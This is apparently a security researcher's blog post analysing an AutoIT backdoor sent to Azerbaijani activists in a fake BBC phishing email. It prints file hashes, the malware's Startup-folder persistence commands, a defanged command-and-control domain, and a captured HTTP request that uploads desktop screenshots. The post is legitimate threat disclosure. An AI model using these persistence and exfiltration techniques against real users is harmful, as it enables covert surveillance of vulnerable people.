Yet another targeted malware against Azerbajani political activists

17 February 2022

The 15th of February, a political activist from Azerbaijan received an e-mail claiming to be from the BBC. The mail had the subject “BBC Suallar” (BBC Questions).

The mail included a link to a RAR compressed file in Google Drive that once downloaded required a password to be decrypted. The password to decrypt the file was included in the phishing e-mail: “bbc”. Compressed files that are password protected are common in malware phishing attacks as the files can not be scanned by antivirus.

1c94f1c6241cb598da5da7150a0dc541 suallar.scr
7fffbc35decc16525e5464bfd2e5b0c5  BBC-suallar.rar

Once the file is executed, a Word Document about SMM (Social Media Marketing) is displayed. But what is happening behind the scenes?

The suallar.scr file is a malware written in AutoIT, the malware is responsible to launch the Word Document but also installs a persistent backdoor in the system

%appdata% & copy /b "C:\Users\QMA\AppData\Local\Temp\EnvGroupPolicy.Exe" "C:\Users\QMA\AppData\Roaming\group_policy_deploy\EnvGroupPolicy.Exe"
%homepath% & copy /b "C:\Users\QMA\AppData\Local\Temp\EnvGroupPolicy.Exe" "C:\Users\HAPUBWS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" && attrib +h +r +s "C:\Users\QMA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

The software connects to the domain name smartappsfoursix{.}xyz to download the rest of his software requirements. It downloads gpoupdater.exe and libcurl.dll that look responsible of uploading files to the command and control server. During the execution of the malware several (10) screenshoots of the Desktop were uploaded to the server.


POST  //upload.php?GUID=xxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 11.0; rv:56.0)  Gecko/20110101 Firefox/98.0.1
Accept: */*
Content-Length:  22829
Content-Type: multipart/form-data;  
Content-Disposition:  form-data; name="file";  filename="_screenshot_12345.123456789.jpg"Content-Type: image/jpeg

De-compiling the Suallar AutoIT Malware

Thanks to AutoIT Ripper from Michał from CERT Polska, we could have a look inside of the malware and confirm the domain used as command and control “smartappsfoursix{.}xyz”